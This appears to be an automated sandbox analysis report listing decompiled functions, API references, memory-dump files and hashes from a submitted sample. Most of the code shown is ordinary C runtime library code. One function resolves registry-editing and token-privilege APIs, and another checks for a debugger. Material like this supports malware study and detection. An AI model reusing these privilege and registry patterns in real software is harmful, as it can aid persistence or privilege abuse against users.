0x0040a0ca
0x0040a0cc
0x0040a0cc
0x0040e5d0
0x0040e5d5
0x0040e5db
0x0040e5e1
0x0040e5e7
0x0040e5ed
0x0040e5f3
0x0040e5fa
0x0040e601
0x0040e608
0x0040e60f
0x0040e616
0x0040e61d
0x0040e61e
0x0040e627
0x0040e62f
0x0040e637
0x0040e642
0x0040e64c
0x0040e651
0x0040e656
0x0040e660
0x0040e66a
0x0040e66f
0x0040e675
0x0040e67a
0x0040e686
0x0040e68b
0x0040e68d
0x0040e695
0x0040e6a0
0x0040e6ad
0x0040e6af
0x0040e6b1
0x0040e6b6
0x0040e6ca

APIs

IsDebuggerPresent.KERNEL32 ref: 0040E680
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040E695
UnhandledExceptionFilter.KERNEL32( hC), ref: 0040E6A0
GetCurrentProcess.KERNEL32(C0000409), ref: 0040E6BC
TerminateProcess.KERNEL32(00000000), ref: 0040E6C3

Strings

hC, xrefs: 0040E69B

Memory Dump Source

Source File: 00000000.00000002.303536971.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.303524803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303587969.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303597691.0000000000413000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303608357.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303642442.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hZDPlQwZ9D.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: hC
API String ID: 2579439406-2247978615
Opcode ID: 385cd2a170f2a97fc37cda40628068a37e901c064ee1e6db45765689b9100950
Instruction ID: 09c682a4a015c4152bdd5dc37a00324bf8597c553bac3e5fee18ff2c315ea601
Opcode Fuzzy Hash: 385cd2a170f2a97fc37cda40628068a37e901c064ee1e6db45765689b9100950
Instruction Fuzzy Hash: F221C0B490230AEFC744EF29ED857543BE4BF08305F22A53AE40897271E7B695818F5D

Uniqueness

Uniqueness Score: -1.00%

Function 00407556 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407556() {

				SetUnhandledExceptionFilter(E00407514);
				return 0;
			}

0x0040755b
0x00407563

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00007514), ref: 0040755B

Memory Dump Source

Source File: 00000000.00000002.303536971.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.303524803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303587969.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303597691.0000000000413000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303608357.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303642442.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hZDPlQwZ9D.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: ae016b183ec4818d9e798ab6a50bd53868866f50311862c66350ca48b0b546d3
Instruction ID: 3e60f7a9aec42581a25d7110ac69d163d8bc144c32bfad42ae7a345b9a5089ad
Opcode Fuzzy Hash: ae016b183ec4818d9e798ab6a50bd53868866f50311862c66350ca48b0b546d3
Instruction Fuzzy Hash: 409002A0A951415ACA1017706D0978569906A9C74775258B66101D8494DEB45044552A

Uniqueness

Uniqueness Score: -1.00%

Function 00418760 Relevance: 1.4, Instructions: 1445COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.303608357.0000000000414000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.303524803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303536971.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303587969.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303597691.0000000000413000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303642442.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hZDPlQwZ9D.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6a8ca797307e157a635dd90dc2311daf1eb43a0da73e19da158aaf39a3e9c98
Instruction ID: 47ef0df9d296cc3c2ace98967c14c7fa5e2905096b97b27ace13485942ea542d
Opcode Fuzzy Hash: e6a8ca797307e157a635dd90dc2311daf1eb43a0da73e19da158aaf39a3e9c98
Instruction Fuzzy Hash: D8C2396244F7C29FD7138B749C705E1BFB0AE1721471E09CBD8C18F1A3E6281A6AD766

Uniqueness

Uniqueness Score: -1.00%

Function 0040FCE0 Relevance: .0, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040FCE0() {

				 *0x43617c = RegCreateKeyA;
				 *0x436180 = RegSetValueA;
				 *0x436184 = GetUserNameA;
				 *0x436188 = RegCloseKey;
				 *0x43618c = RegOpenKeyExA;
				 *0x436190 = AdjustTokenPrivileges;
				 *0x436194 = LookupPrivilegeValueA;
				 *0x436198 = OpenProcessToken;
				 *0x43619c = RegQueryValueExA;
				 *0x4361a0 = RegDeleteKeyA;
				return RegDeleteKeyA;
			}

0x0040fce8
0x0040fcf3
0x0040fcff
0x0040fd0a
0x0040fd15
0x0040fd21
0x0040fd2c
0x0040fd37
0x0040fd43
0x0040fd4e
0x0040fd54

Memory Dump Source

Source File: 00000000.00000002.303536971.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.303524803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303587969.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303597691.0000000000413000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303608357.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303642442.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hZDPlQwZ9D.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54614e99475a39c56f07e29115294c7bcfde7f10b4f8b8c46cc9be2a9ad08c16
Instruction ID: d06693df1eb4789d3504016fa154fbf7829411eda2d79d575c2d5e41cd5ab6f8
Opcode Fuzzy Hash: 54614e99475a39c56f07e29115294c7bcfde7f10b4f8b8c46cc9be2a9ad08c16
Instruction Fuzzy Hash: 8DF0DDB4A04209AFCB54CF19F981A517BE5B34D354712D13AE9488333AD7B1A881DF5C

Uniqueness

Uniqueness Score: -1.00%

Function 00413154 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.303597691.0000000000413000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.303524803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303536971.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303587969.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303608357.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303642442.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hZDPlQwZ9D.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d0bfc2ef7b64e396843138ab717a1f3c293dc8ee292486fa54476fd2f3b6864
Instruction ID: cad284660f4883ced9ee30f41ec3a05f4c30f90f09a2891627427e31f4271361
Opcode Fuzzy Hash: 6d0bfc2ef7b64e396843138ab717a1f3c293dc8ee292486fa54476fd2f3b6864
Instruction Fuzzy Hash: E6E0DF36650104BBC7219E4AC800CC3F7E9EB987B1709446AE94583620C234FD40C6D8

Uniqueness

Uniqueness Score: -1.00%

Function 00408451 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 57
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 92%

			E00408451(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t46;
				void* _t47;

				_t35 = __ebx;
				_push(0xc);
				_push(0x412208);
				E004088B8(__ebx, __edi, __esi);
				_t45 = L"KERNEL32.DLL";
				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t23 == 0) {
					_t23 = E00407564(_t45);
				}
				 *(_t47 - 0x1c) = _t23;
				_t46 =  *((intOrPtr*)(_t47 + 8));
				 *((intOrPtr*)(_t46 + 0x5c)) = 0x411620;
				 *((intOrPtr*)(_t46 + 0x14)) = 1;
				if(_t23 != 0) {
					_t35 = GetProcAddress;
					 *((intOrPtr*)(_t46 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
					 *((intOrPtr*)(_t46 + 0x1fc)) = GetProcAddress( *(_t47 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t46 + 0x70)) = 1;
				 *((char*)(_t46 + 0xc8)) = 0x43;
				 *((char*)(_t46 + 0x14b)) = 0x43;
				 *(_t46 + 0x68) = 0x4352f0;
				E0040A49A(_t35, 1, 0xd);
				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
				InterlockedIncrement( *(_t46 + 0x68));
				 *(_t47 - 4) = 0xfffffffe;
				E00408526();
				E0040A49A(_t35, 1, 0xc);
				 *(_t47 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t47 + 0xc));
				 *((intOrPtr*)(_t46 + 0x6c)) = _t28;
				if(_t28 == 0) {
					_t32 =  *0x4358f8; // 0x435820
					 *((intOrPtr*)(_t46 + 0x6c)) = _t32;
				}
				E004093A9( *((intOrPtr*)(_t46 + 0x6c)));
				 *(_t47 - 4) = 0xfffffffe;
				return E004088FD(E0040852F());
			}

0x00408451
0x00408451
0x00408453
0x00408458
0x0040845d
0x00408463
0x0040846b
0x0040846e
0x00408473
0x00408474
0x00408477
0x0040847a
0x00408484
0x00408489
0x00408491
0x00408499
0x004084a9
0x004084a9
0x004084af
0x004084b2
0x004084b9
0x004084c0
0x004084c9
0x004084cf
0x004084d6
0x004084dc
0x004084e3
0x004084ea
0x004084f0
0x004084f3
0x004084f6
0x004084fb
0x004084fd
0x00408502
0x00408502
0x00408508
0x0040850e
0x0040851f

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00412208,0000000C,0040858C,00000000,00000000,?,00000000,?,00407497,00000000,00010000,00030000,?,00406776), ref: 00408463
__crt_waiting_on_module_handle.LIBCMT ref: 0040846E

Part of subcall function 00407564: Sleep.KERNEL32(000003E8,00000000,?,004083B4,KERNEL32.DLL,?,00408400,?,00000000,?,00407497,00000000,00010000,00030000,?,00406776), ref: 00407570
Part of subcall function 00407564: GetModuleHandleW.KERNEL32(00000000,?,004083B4,KERNEL32.DLL,?,00408400,?,00000000,?,00407497,00000000,00010000,00030000,?,00406776), ref: 00407579

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00408497
GetProcAddress.KERNEL32(?,DecodePointer), ref: 004084A7
__lock.LIBCMT ref: 004084C9
InterlockedIncrement.KERNEL32(?), ref: 004084D6
__lock.LIBCMT ref: 004084EA
___addlocaleref.LIBCMT ref: 00408508

Strings

KERNEL32.DLL, xrefs: 0040845D, 00408462, 0040846D
XC, xrefs: 004084FD
DecodePointer, xrefs: 0040849F
EncodePointer, xrefs: 0040848B

Memory Dump Source

Source File: 00000000.00000002.303536971.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.303524803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303587969.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303597691.0000000000413000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303608357.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303642442.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hZDPlQwZ9D.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: XC$DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-1799837370
Opcode ID: 35e811f93fed6c1a1530a680193e5defa7b15b35b1a428c61b4b244e352c5d61
Instruction ID: 4fd03a62102d850005aab64c15c1100668cc4d78bb8a89ebd14cb37fac664335
Opcode Fuzzy Hash: 35e811f93fed6c1a1530a680193e5defa7b15b35b1a428c61b4b244e352c5d61
Instruction Fuzzy Hash: 01115171840701AFD720EF36ED05B9ABBE0AF04314F10852FE599A62E1CFB89A418F1D

Uniqueness

Uniqueness Score: -1.00%

Function 0040950F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E0040950F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t13;
				void* _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x412298);
				E004088B8(__ebx, __edi, __esi);
				_t29 = E004085B1(__ebx, _t31);
				_t13 =  *0x435814; // 0xfffffffe
				if(( *(_t29 + 0x70) & _t13) == 0) {
					L6:
					E0040A49A(_t22, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t8 = _t29 + 0x6c; // 0x6c
					_t27 =  *0x4358f8; // 0x435820
					 *((intOrPtr*)(_t30 - 0x1c)) = E004094D1(_t8, _t25, _t27);
					 *(_t30 - 4) = 0xfffffffe;
					E00409579();
				} else {
					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E004085B1(_t22, _t33) + 0x6c));
					}
				}
				if(_t29 == 0) {
					E00407594(_t25, 0x20);
				}
				return E004088FD(_t29);
			}

0x0040950f
0x0040950f
0x0040950f
0x0040950f
0x0040950f
0x00409511
0x00409516
0x00409520
0x00409522
0x0040952a
0x0040954e
0x00409550
0x00409556
0x0040955a
0x0040955d
0x00409568
0x0040956b
0x00409572
0x0040952c
0x0040952c
0x00409530
0x00000000
0x00409532
0x00409537
0x00409537
0x00409530
0x0040953c
0x00409540
0x00409545
0x0040954d

APIs

__getptd.LIBCMT ref: 0040951B

Part of subcall function 004085B1: __getptd_noexit.LIBCMT ref: 004085B4
Part of subcall function 004085B1: __amsg_exit.LIBCMT ref: 004085C1

__getptd.LIBCMT ref: 00409532
__amsg_exit.LIBCMT ref: 00409540
__lock.LIBCMT ref: 00409550

Strings

XC, xrefs: 0040955D

Memory Dump Source

Source File: 00000000.00000002.303536971.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.303524803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303587969.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303597691.0000000000413000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303608357.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303642442.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hZDPlQwZ9D.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: XC
API String ID: 3521780317-1522227332
Opcode ID: 5050b8a41057851bd6f43188049cbb9405bb1c291b864d72d4e2b1cb3c67f84d
Instruction ID: fb0fc79a894db7fc51b583fe5d56397d9122888f3d4a209085aea2c5d13da969
Opcode Fuzzy Hash: 5050b8a41057851bd6f43188049cbb9405bb1c291b864d72d4e2b1cb3c67f84d
Instruction Fuzzy Hash: A2F04932944720EBD661BB669D0278973A0AB40728F14827FA480B62D3CA7C9D018A5E

Uniqueness

Uniqueness Score: -1.00%

Function 00408DA3 Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E00408DA3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x412258);
				E004088B8(__ebx, __edi, __esi);
				_t31 = E004085B1(__ebx, _t35);
				_t15 =  *0x435814; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0040A49A(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x435718; // 0x2551610
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x4352f0;
								if(__eflags != 0) {
									_push(_t33);
									E0040AD10(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x435718; // 0x2551610
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x435718; // 0x2551610
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00408E3E();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E00407594(_t29, 0x20);
				}
				return E004088FD(_t33);
			}

0x00408da3
0x00408da3
0x00408da3
0x00408da3
0x00408da5
0x00408daa
0x00408db4
0x00408db6
0x00408dbe
0x00408ddf
0x00408de5
0x00408de9
0x00408dec
0x00408def
0x00408df5
0x00408df7
0x00408df9
0x00408dfc
0x00408e02
0x00408e04
0x00408e06
0x00408e0c
0x00408e0e
0x00408e0f
0x00408e14
0x00408e0c
0x00408e04
0x00408e15
0x00408e1a
0x00408e1d
0x00408e23
0x00408e27
0x00408e27
0x00408e2d
0x00408e34
0x00408dc6
0x00408dc6
0x00408dc6
0x00408dcb
0x00408dcf
0x00408dd4
0x00408ddc

APIs

__getptd.LIBCMT ref: 00408DAF

Part of subcall function 004085B1: __getptd_noexit.LIBCMT ref: 004085B4
Part of subcall function 004085B1: __amsg_exit.LIBCMT ref: 004085C1

__amsg_exit.LIBCMT ref: 00408DCF
__lock.LIBCMT ref: 00408DDF
InterlockedDecrement.KERNEL32(?), ref: 00408DFC
InterlockedIncrement.KERNEL32(02551610), ref: 00408E27

Memory Dump Source

Source File: 00000000.00000002.303536971.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.303524803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303587969.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303597691.0000000000413000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303608357.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303642442.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hZDPlQwZ9D.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: ff43307d8d83874d63f1111a99ca26deed0f94ab059c3dacfa165820130e1cc9
Instruction ID: 441f9565e3e845219f4ffc23afb8dfba353d9b45f520285fff6cfb8913e38b0d
Opcode Fuzzy Hash: ff43307d8d83874d63f1111a99ca26deed0f94ab059c3dacfa165820130e1cc9
Instruction Fuzzy Hash: EF016131900B11ABDB11BB259A0979E77A0AF44724F14413FE450B76D1CF7C6991CBDE

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD10 Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 43%

			E0040AD10(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x412378);
				_t8 = E004088B8(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E004088FD(_t8);
				}
				if( *0x436c28 != 3) {
					_push(_t23);
					L7:
					_t8 = HeapFree( *0x436624, 0, ??);
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E00409EA5(_t31);
						 *_t10 = E00409E63(GetLastError());
					}
					goto L9;
				}
				E0040A49A(__ebx, __edi, 4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E0040B255(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E0040B285();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E0040AD66();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

0x0040ad10
0x0040ad12
0x0040ad17
0x0040ad1c
0x0040ad21
0x0040ad98
0x0040ad9d
0x0040ad9d
0x0040ad2a
0x0040ad6f
0x0040ad70
0x0040ad78
0x0040ad7e
0x0040ad80
0x0040ad82
0x0040ad95
0x0040ad97
0x00000000
0x0040ad80
0x0040ad2e
0x0040ad34
0x0040ad39
0x0040ad3f
0x0040ad44
0x0040ad46
0x0040ad47
0x0040ad48
0x0040ad4e
0x0040ad4f
0x0040ad56
0x0040ad5f
0x00000000
0x0040ad61
0x0040ad61
0x00000000
0x0040ad61

APIs

__lock.LIBCMT ref: 0040AD2E

Part of subcall function 0040A49A: __mtinitlocknum.LIBCMT ref: 0040A4B0
Part of subcall function 0040A49A: __amsg_exit.LIBCMT ref: 0040A4BC
Part of subcall function 0040A49A: EnterCriticalSection.KERNEL32(?,?,?,0040EF42,00000004,004123F8,0000000C,0040ADF9,00000000,?,00000000,00000000,00000000,?,00408563,00000001), ref: 0040A4C4

___sbh_find_block.LIBCMT ref: 0040AD39
___sbh_free_block.LIBCMT ref: 0040AD48
HeapFree.KERNEL32(00000000,00000000,00412378,0000000C,0040A47B,00000000,004122D8,0000000C,0040A4B5,00000000,?,?,0040EF42,00000004,004123F8,0000000C), ref: 0040AD78
GetLastError.KERNEL32(?,0040EF42,00000004,004123F8,0000000C,0040ADF9,00000000,?,00000000,00000000,00000000,?,00408563,00000001,00000214), ref: 0040AD89

Memory Dump Source

Source File: 00000000.00000002.303536971.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.303524803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303587969.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303597691.0000000000413000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303608357.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303642442.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hZDPlQwZ9D.jbxd

Yara matches

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 929ea63fc073373249bf848806b03275757397bc6f4b48c38729d7624860a239
Instruction ID: 6b708aa74a755268a48a2b37da51f3c7c96917123372928ee305e4d41cd6d33d
Opcode Fuzzy Hash: 929ea63fc073373249bf848806b03275757397bc6f4b48c38729d7624860a239
Instruction Fuzzy Hash: E401D631801305EADF30BB729C0AB5E3A64AF41766F14813FF444B61D1DF7C99919A9E

Uniqueness

Uniqueness Score: -1.00%

Function 004074EB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E004074EB() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x411000;
					_v28 =  *0x410ff8;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x004074f0
0x004074f8
0x0040750f
0x004074bb
0x004074c4
0x004074d0
0x004074d3
0x004074d6
0x004074d8
0x004074db
0x004074e0
0x004074ea
0x004074e2
0x004074e6
0x004074e6
0x004074fa
0x00407500
0x00407508
0x00000000
0x0040750a
0x0040750a
0x0040750e
0x0040750e
0x00407508

APIs

GetModuleHandleA.KERNEL32(KERNEL32,00406766), ref: 004074F0
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00407500

Strings

IsProcessorFeaturePresent, xrefs: 004074FA
KERNEL32, xrefs: 004074EB

Memory Dump Source

Source File: 00000000.00000002.303536971.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.303524803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303587969.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303597691.0000000000413000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303608357.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303642442.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hZDPlQwZ9D.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: b2b38293a0db41928a4640de9a86d46682f763b810ec1735ad243b5ce21a3c96
Instruction ID: 282fe9f865f3d36daa797e4708ecfd4c371db0528f4a4191e5d0c73fda5353ac
Opcode Fuzzy Hash: b2b38293a0db41928a4640de9a86d46682f763b810ec1735ad243b5ce21a3c96
Instruction Fuzzy Hash: A5F03030E44A09E2DB101BA1BD0A7EF7E78BB84746F9205A192D2B04D8DF7891F5824A

Uniqueness

Uniqueness Score: -1.00%

Function 004073B6 Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004073B6(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00406CA7(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00406D97(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E004072BC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00407201(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x004073bb
0x004073c1
0x00407434
0x00000000
0x004073c8
0x004073c8
0x004073cb
0x004073e6
0x004073e9
0x00407409
0x0040741b
0x004073eb
0x004073eb
0x004073ee
0x00000000
0x004073f0
0x00407402
0x00407402
0x004073ee
0x00407439
0x0040743d
0x004073cd
0x004073e5
0x004073e5
0x004073cb

APIs

__cftof_l.LIBCMT ref: 004073DC

Part of subcall function 00407201: __fltout2.LIBCMT ref: 0040722D

__cftog_l.LIBCMT ref: 00407402
__cftoe_l.LIBCMT ref: 00407434

Memory Dump Source

Source File: 00000000.00000002.303536971.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

